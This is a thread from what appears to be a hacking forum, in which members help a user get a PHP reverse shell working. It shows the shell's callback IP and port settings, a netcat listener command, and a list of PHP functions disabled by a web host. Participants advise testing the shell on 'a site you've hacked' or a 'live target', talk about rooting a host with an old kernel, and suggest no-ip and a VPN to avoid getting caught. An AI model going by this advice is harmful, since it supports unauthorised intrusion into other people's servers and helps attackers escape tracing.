iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
[help]issues with setting up reverse php shell.
  • mandi
    Posts: 207
    As the topic says,i had some issues with setting up a reverse php shell

    i downloaded this php-reverse shell

    http://pentestmonkey.net/tools/web-shells/php-reverse-shell


    And i modified this part

    $ip = '127.0.0.1';  // CHANGE THIS
    $port = 1234;  // CHANGE THIS


    with my ip address and port 135(that is the only open port i found in my pc during port scan )
    i am using xp-sp2 for this purpose.

    and i saved the file, and uploaded to the web-host .

    and i opened the php-reverse shell in my browser and after that i opened netcat and typed the following command as mentioned in the tutorial 


    $ nc -v -n -l -p 135


    But i am getting like this

    http://i55.tinypic.com/2hnneck.jpg

    i dont know what went wrong,also i am having dynamic ip,i dont like to set-up the whole thing each and every time,

    here are my questions :
    1)what is the problem in my set-up
    2)and what should i do in order to avoid the uploading and changing the configuration of php-reverse shell each time?
    3)Also does php function restrictions and safe mode if set to ON will have impact on the reverse shell set-up?

    4)Or from your experience please suggest me a best way/tutorial to get a reverse shell from the target.
    because i would like to play with kernel exploits,execute os commands and other funny things.

    hope i will find some help here..
  • Sh3llc0d3
    Posts: 1,910
    What happens when you load the php file?

    Guessing what your answer will be and assuming you aren't running the php shell in an appropriate environment (php enabled correctly). You are trying to a) use a php shell in an environment that will not allow it b) the ip will need to be changed every time your ip changes. You can't do much about that without changing to a static ip. It's easy to setup (google is your friend).

    To fix... taking on board my assumptions are correct... you need to download xampp or wampserver (i recommend wampserver) - install it and copy the php file into the root directory C:/wamp/www/ (by default) and then open it in your browser. Wampserver and xampp both have apache and php installed which will run your php file fine.

    Try that, find your ip and put the correct one in and then load netcat. Let us know the outcome :)
  • mandi
    Posts: 207
    Actually i tried to set up this thing in a free web host ,to learn some server rooting techniques and i had some good news and bad news

    bad news :
    the follwoing are the list of php functions being restricted in the web-host

    fopen,fwrite,gethostbyname,file_put_contents,ini_set,system,exec,phpinfo,escapeshellarg,upload_file,rmdir,escapeshellcmd,passthru,proc_close,proc_open,shell_exec,chmod,chown,chroot,chgrp,fsockopen,ftp_connect,ftp_ssl_connect,pfsockopen,socket_connect,socket_cr​eate,socket_listen,socket_bind,socket_accept,socket_create_listen,socket_send,socket_write,socket_read,symlink,mail,dl,inf


    And after this i made the netcat to work
    here is the picture

    http://i51.tinypic.com/2ivma8y.jpg

    and when i opened the shell in the web-host nothing is happening.
    may be it is the effect of php function restrictions?

    can you enlighten me with any ideas to get past these restrictions to get a successfull back connection please ?
  • Sh3llc0d3
    Posts: 1,910
    The shell won't work on hosting because it is designed to open a socket connection between the shell on the server (this means opening a port) and the netcat session. This is something most shared hosting actively blocks. You have pretty much no control over ports on shared web hosting only an ftp account.

    Those restrictions are put there for a purpose and risking trying to enable them just to check a shell isn't worth the effort. You'd be better finding a site you've hacked and trying it out live.

    EDIT: Out of that list the below are the ones that are used for socket programming:

    gethostbyname,fsockopen,ftp_connect,ftp_ssl_connect,pfsockopen,sock​et_connect,socket_cr​eate,socket_listen,socket_bind,socket_accept,socket_create_​listen,socket_send,socket_write,socket_read


    The rest are mostly to allow for basic linux administration tasks (rmdir etc).
  • mandi
    Posts: 207 

    The shell won't work on hosting because it is designed to open a socket connection between the shell on the server (this means opening a port) and the netcat session. This is something most shared hosting actively blocks. You have pretty much no control over ports on shared web hosting only an ftp account.

    Those restrictions are put there for a purpose and risking trying to enable them just to check a shell isn't worth the effort. You'd be better finding a site you've hacked and trying it out live.

    EDIT: Out of that list the below are the ones that are used for socket programming:



    got it mate,so it seems the set-up was ok,due to the socket restrictions implemented (i.e via disabled php functions) in the web server is preventing me right ?

    yes i am going to try this on a live target :)

    and i am going to tell you the truth ,i had uploaded the shell on t35.com,but they had disabled many php functions ,but they are using a kernel slightly older one 2.6.18 i think,it looks rootable .



    And one last question mate,assume none of the functions are disabled,but if suppose safe mode is ENABLED,in that case can i sucessfully get a back connection mate using the set-up i followed?

    And thanks for the clarification mate,you always rockz when it comes to coding :)
  • Sh3llc0d3
    Posts: 1,910
    I'm not 100% sure on the php safe mode but you should be able to make a socket connection. Yeah it would seem the restrictions on the web server are the cause of your problems. They do it for that reason lol. Also make sure if it's your main t35 account you remove the script from their servers. They can be quite shitty with dodgy scripts.

    I'd put money on it that it'd work on a normal live target. You could boot into backtrack (as it has apache webserver and php installed and try it on there locally).
  • m0rph
    Posts: 332
    I almost guarantee it's solely not working because of the port you chose. TCP: 135 is a Windows RPC port, and as far as I'm aware of it's usually listening by default.

    Change your port. It should work then. Also, don't be in a private network when using reverse shells. Port forwarding is retarded, and a waste of time.

    Simply plug your computer directly into your modem. Restart your modem, and refresh your IP-address in whatever OS you are using.

    Another thing to be cautious about when using reverse shells...you leave yourself wide open to being traced back. There's really very few things you can do for anonymity with reverse shells.

    But, to solve your initial problem...change your listening port.
    while( !(succeed = try() ) );
  • mandi
    Posts: 207
    I would like to say some things i had heard ,
    heard that in php 6 there would be no magic quotes protection and safe mode :)

    but i dont know what is the equivalent security mechanisms they are going to include there as an alternate for these ?

    And thanks for the idea mate :),i am actually trying this on wampp server in windows environment.



    [hr]

    I almost guarantee it's solely not working because of the port you chose. TCP: 135 is a Windows RPC port, and as far as I'm aware of it's usually listening by default.

    Change your port. It should work then. Also, don't be in a private network when using reverse shells. Port forwarding is retarded, and a waste of time.

    Simply plug your computer directly into your modem. Restart your modem, and refresh your IP-address in whatever OS you are using.

    Another thing to be cautious about when using reverse shells...you leave yourself wide open to being traced back. There's really very few things you can do for anonymity with reverse shells.

    But, to solve your initial problem...change your listening port.


    Thanks mate,see my second picture,
    and regarding anonimity we can do like this nah ?
    create a no-ip account and place the address of it in the shell and access the shell with a vpn connection :),i think if we do like this the chances of getting caught would be very very less.
  • Xin
    Posts: 3,251
    I havent really read through the whole thread so i could be wrong, but your trying to use port 135 as its the only port on your computer. IF you have scanned yourself from nmap, it will not show what it looks like to the outside, you need to use a website to check yourself, as it could be open locally but your router blocks it. So you will need to open ports on your router.

    Another reason why it may not work is that port 135 is most likely being used already.
    Xin
Add a Comment